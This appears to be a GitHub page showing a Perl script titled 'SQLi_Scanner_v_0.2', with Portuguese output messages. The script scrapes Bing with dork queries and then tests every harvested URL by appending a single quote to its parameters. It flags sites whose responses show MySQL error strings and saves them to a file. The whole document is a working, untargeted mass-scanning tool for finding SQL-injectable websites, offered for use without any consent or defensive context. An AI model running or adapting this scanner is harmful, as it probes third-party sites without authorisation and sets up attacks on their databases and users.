-
Notifications
You must be signed in to change notification settings - Fork 6
Expand file tree
/
Copy pathscanner_perl_sql_-_error_bing.pl
More file actions
120 lines (105 loc) · 3.16 KB
/
scanner_perl_sql_-_error_bing.pl
File metadata and controls
120 lines (105 loc) · 3.16 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
BEGIN { $ENV{ACTIVEPERL_CONFIG_DISABLE} = 1; }
#perl2exe_exclude "File/BSDGlob.pm"
#perl2exe_exclude "Compress/Bzip2.pm"
#perl2exe_exclude "I18N/Langinfo.pm"
#perl2exe_include "attributes.pm"
use strict;
no warnings;
use threads;
use threads::shared;
use LWP::UserAgent;
use Term::ANSIColor;
use HTTP::Request::Common qw(POST);
my $threads = 10;
my $ua = LWP::UserAgent->new;
$ua->timeout(15);
$ua->agent('Mozilla/5.0');
my @dorkz : shared;
my @linkz : shared;
system("cls");
system("color A");
print "++++++++++++++++++++++++++++++++++++++++++++++++\n";
print color("red"),"+ SQLi_Scanner_v_0.2 +\n",color("reset");
print "+ +\n";
print "++++++++++++++++++++++++++++++++++++++++++++++++\n";
print "\n[i]Motor de busca: bing.com\n";
print "\[.]Iniciando...\n";
GetDorkz();
print "[i]Quantidade de Dorks: ".scalar(@dorkz)."\n";
GetLinks();
while (threads->list) {}
print "[i]Links encontrados: ".scalar(@linkz)."\n";
print "[.]Começar testes...\n\n";
CheckLinks();
while (threads->list) {}
print "[!]Tudo feito, verificar output_injection.txt\n\n";
sub CheckLinks {
foreach my $link( @linkz ) {
my $ctr = 0;
foreach my $thr ( threads->list ) { $ctr++; }
if ($ctr < $threads){
threads->create( \&InjectionCheck, $link );
}
else { redo; }
}
}
sub GetLinks {
foreach my $dork( @dorkz ) {
my $ctr = 0;
foreach my $thr ( threads->list ) { $ctr++; }
if ($ctr < $threads){
threads->create( \&GetLinks_bing,$dork );
}
else { redo; }
}
}
sub GetDorkz {
open( DORKZ, "input.txt" ) or die "$!\n";
while( defined( my $line_ = <DORKZ> ) ) {
chomp( $line_ );
push( @dorkz, $line_ );
}
close( DORKZ );
}
## BING_SEARCH
## http://www.bing.com/search?q=index.php%3Fid%3D&filt=all&first=1
sub GetLinks_bing {
my $dork = shift;
chomp( $dork );
for( my $i = 1; $i < 960; $i = $i + 50 ) {
my $url = "http://www.bing.com/search?q=".$dork."&&filt=rf&first=".$i;
my $content = $ua->get($url)->content;
while( $content =~ m/<h3><a href="(.+?)"/gi ) {
my $link = $1;
$link =~ s/&/&/g;
#print $link."\n";
push( @linkz, $link );
}
}
threads->detach();
}
sub InjectionCheck {
my $link = shift;
chomp( $link );
print color("red"),"[-]Não: $link\n",color("reset");
my $content = $ua->get($link)->content;
for(my $position = 0; ($position = index($link, "=", $position)) >= 0; $position++) {
my $linkcpy = $link;
substr($linkcpy, $position, 1) = "='";
my $content2 = $ua->get($linkcpy)->content;
unless( $content eq $content2 ) {
if( $content2 =~ m/mysql_fetch_/i || $content2=~ m/You have an error in your SQL syntax/i || $content2 =~ m/tem um erro de sintaxe no seu SQL/i || $content2 =~ m/mysql_num_rows/i || $content2 =~ m/Division by zero in/i ) {
print color("green"),"[+]Vulnerável: ".$linkcpy."\n",color("reset");
Output( $linkcpy );
threads->detach();
}
}
}
threads->detach();
}
sub Output {
my $para = shift;
open (OUT, '>>output_injection.txt') or die("Não é possível gravar output_injection\n");
print OUT $para."\n";
close (OUT);
}